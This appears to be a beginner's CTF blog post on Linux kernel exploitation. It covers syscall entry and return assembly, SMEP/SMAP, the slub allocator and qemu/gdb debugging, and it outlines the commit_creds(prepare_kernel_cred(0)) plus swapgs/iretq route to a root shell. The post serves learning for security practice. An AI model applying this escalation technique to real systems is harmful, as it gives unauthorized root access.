Posts List
  1. Background
  2. Analyse
    1. Basic Knowledge
    2. File struct
    3. Mitigation
  3. Debug
  4. Basic Exploit

Introductions to Linux Kernel Pwn

Background

Linux Kernel pwn is an item of CTF Pwn. Unlike we always solve the common problems with python, we usually do Kernel pwn with C. Since I’m just getting started with it, I want to write something down.

Analyse

Basic Knowledge

User space to Kernel space

  1. Switching the GS segment register through swapgs, which is to swap the value of the GS register with the value of a specific position in order to save the GS value and use the value of this position as the GS value when the kernel executes.
  2. The top of the current stack (User space stack top) is recorded in the CPU exclusive variable area, and the top of the kernel stack recorded in the CPU exclusive area is placed in the rsp (esp).

  3. By pushing each register value, the code is as follows:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
ENTRY(entry_SYSCALL_64)
/*
* Interrupts are off on entry.
* We do not frame this tiny irq-off block with TRACE_IRQS_OFF/ON,
* it is too small to ever cause noticeable irq latency.
*/
SWAPGS_UNSAFE_STACK
/*
* A hypervisor implementation might want to use a label
* after the swapgs, so that it can do the swapgs
* for the guest and jump here on syscall.
*/
GLOBAL(entry_SYSCALL_64_after_swapgs)

movq %rsp, PER_CPU_VAR(rsp_scratch)
movq PER_CPU_VAR(cpu_current_top_of_stack), %rsp

TRACE_IRQS_OFF

/* Construct struct pt_regs on stack */
pushq $__USER_DS /* pt_regs->ss */
pushq PER_CPU_VAR(rsp_scratch) /* pt_regs->sp */
pushq %r11 /* pt_regs->flags */
pushq $__USER_CS /* pt_regs->cs */
pushq %rcx /* pt_regs->ip */
pushq %rax /* pt_regs->orig_ax */
pushq %rdi /* pt_regs->di */
pushq %rsi /* pt_regs->si */
pushq %rdx /* pt_regs->dx */
pushq %rcx /* pt_regs->cx */
pushq $-ENOSYS /* pt_regs->ax */
pushq %r8 /* pt_regs->r8 */
pushq %r9 /* pt_regs->r9 */
pushq %r10 /* pt_regs->r10 */
pushq %r11 /* pt_regs->r11 */
sub $(6*8), %rsp /* pt_regs->bp, bx, r12-15 not saved */

Kernel space return to User space

  1. Restore GS value by swapgs.
  2. Restore to user space through sysretq or iretq for execution, if you use Iretq, you still need to give some information in the User space, such as CS value, eflags flag register value, user stack top position and so on.

For example:

1
2
3
4
5
6
7
push $SS_USER_VALUE
push $USERLAND_STACK
push $USERLAND_EFLAGS
push $CS_USER_VALUE
push $USERLAND_FUNCTION_ADDRESS
swapgs
iretq

File struct

In CTF, we always got these files

1
2
3
boot.sh -- a bash script to start Kernel (basically using qemu)
bzImage -- Kernel binary
rootfs.cpio -- an image of the root file, including .ko file, /etc, /bin, /sys, etc

In most cases, we need to analyse the .ko file, which is a linux Kernel module. By inserting the Kernel module into the Kernel, some driver code can be dynamically loaded to be responsible for interacting with the hardware, or provide some software functions at the Kernel layer. The Kernel module runs in the Kernel space and can interact with device files, such as /dev/. Many of the files in the directory are device files. The use of open and close functions is to open device files, close device files, etc. These functions are defined in the Kernel module, and then set in accordance with certain rules when loading, so through these functions you can call the appropriate set of functions in the Kernel module, and finally complete a series of operations in the Kernel to provide functionality for User space.

Mitigation

The Mitigations of Kernel space is almost like User space, such as aslr, canary, dep, etc. But there are some differences.

In Kernel space there is a mitigation called SMEP, which is used to avoid hijacking the control flow from the Kernel space, making the control flow back to the User space, and execute the User space code as ring 0 to raise the power. When the SMEP is turned on, the CPU will stop executing User space code in ring 0. This is a CPU function that is managed by the CPU’s CR4 register and uses a bit to indicate whether SMEP protection is enabled. However, SMEP protection does not prevent direct access to data from User space, but simply prevents the execution of User-space code.

SMAP is like SMEP, preventing ring 0 in Kernel from getting data from User space.

Memory allocation is also required in the Kernel space. Unlike malloc in User space, Kernel uses kmalloc, which uses slab/slub distributors, now more common are slub allocators. This distributor is managed through a multi-level structure. First, there is the cache layer. The cache is a structure. The inside is managed by saving empty objects, partially using objects, and using objects completely. Objects refer to memory objects, that is will be allocated or a part of the Kernel space that is allocated. Kmalloc uses multiple caches, one cache for a set of memory objects of size two.

The slab allocator strictly differentiates according to the cache. Different caches cannot be allocated on one page. The slub allocator is looser. If different caches are allocated the same size, they may be within one page. This point is very important, which The basic exploit will use.

Debug

First we need to unpack .cpio

1
2
mkdir initframs && cp test.cpio initframs && cd initframs
cpio -idmv < test.cpio

Now, we can find .ko and load it to ida to analyse.

Then we copy our exp to initframs and do

1
find ./* | cpio -H newc -o > test.cpio

After that, when we start Kernel, we will find exp in it.

Start Kernel with ‘-s’ parameter, such as

1
2
3
4
5
6
7
8
qemu-system-x86_64 \
-m 256M \
-Kernel ./bzImage \
-initrd ./core.cpio \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \
-netdev User,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic \
-s \

Then we can debug Kernel in gdb

1
target remote tcp::1234

We can use some useful command

1
2
lsmod -- list addresses of loaded modules
cat /proc/kallsyms -- get addresses of all symbols in Kernel

Basic Exploit

Since the Kernel manages running processes, it keeps track of permissions.

Conveniently, the Linux Kernel has a wrapper for updating process credentials.

Linux Kernel source code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
struct task_struct {
...
/* Process credentials: */

/* Tracer's credentials at attach: */
const struct cred __rcu *ptracer_cred;

/* Objective and real subjective task credentials (COW): */
const struct cred __rcu *real_cred;

/* Effective (overridable) subjective task credentials (COW): */
const struct cred __rcu *cred;
...
}
1
2
3
4
5
6
struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
const struct cred *old;
struct cred *new;
...
}
1
2
3
4
5
6
int commit_creds(struct cred *new)
{
struct task_struct *task = current;
const struct cred *old = task->real_cred;
...
}

Therefore, we could

  1. Create a root struct cred by calling prepare_kernel_cred(0)
  2. Call commit_creds(root cred *) to set the credential of the process to root
  3. swapgs & iretq to User space to system(‘/bin/sh’)